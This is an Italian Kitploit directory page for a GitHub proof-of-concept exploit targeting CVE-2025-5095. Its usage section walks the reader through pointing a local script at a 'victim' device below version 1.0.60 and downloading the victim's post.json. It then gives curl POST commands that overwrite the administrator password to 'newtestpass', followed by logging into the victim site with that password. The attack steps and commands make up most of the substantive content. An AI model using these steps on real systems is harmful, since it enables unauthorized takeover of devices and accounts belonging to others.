Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5095-POC — POC Python per CVE-2025-5095 | Kitploit
Strumenti/GitHubGitHub/teteuxd2/cve-2025-5095-poc
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubteteuxd2/cve-2025-5095-poc

CVE-2025-5095-POC

POC Python per CVE-2025-5095

Vedi Repository
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Come Usare:

Apri Login.htm e modifica i punti in cui IP:PORT è l'indirizzo della vittima

image

Modifica la parte var LoginVersion = "Check On The Victim Site"; con la versione della pagina della vittima, in questo modo puoi visitare la pagina della vittima e visualizzare il sorgente ATTENZIONE: QUESTA CVE FUNZIONA SOLO SU VERSIONI ANTERIORI ALLA 1.0.60

image

Scarica il file post.json dal sito della vittima (http://victimip:port/post.json) Spostalo nella cartella dello script e avrai 3 file

image

Ora esegui il file python e accedi a 127.0.0.1:8080/login.htm (Se la porta 8080 è già in uso, puoi cambiarla aprendo lo script in un editor di testo e modificando l'ultima parte)

image

Ignora l'avviso quando apri la pagina di login

Apri un terminale e usa questi comandi curl, se stampa "success" ha funzionato.

curl -v -X POST http://localhost:8080/post.json -d "UserPassword0=newtestpass"

curl -v -X POST http://localhost:8080/post.json -d "UsersSaveConfig=true"

image

Per verificare se la pagina è cambiata, invia questo comando:

curl http://localhost:8080/check_password

Ora visita il sito della vittima (non quello su localhost) e inserisci la nuova password, in questo esempio la password è "newtestpass"

Scarica lo strumento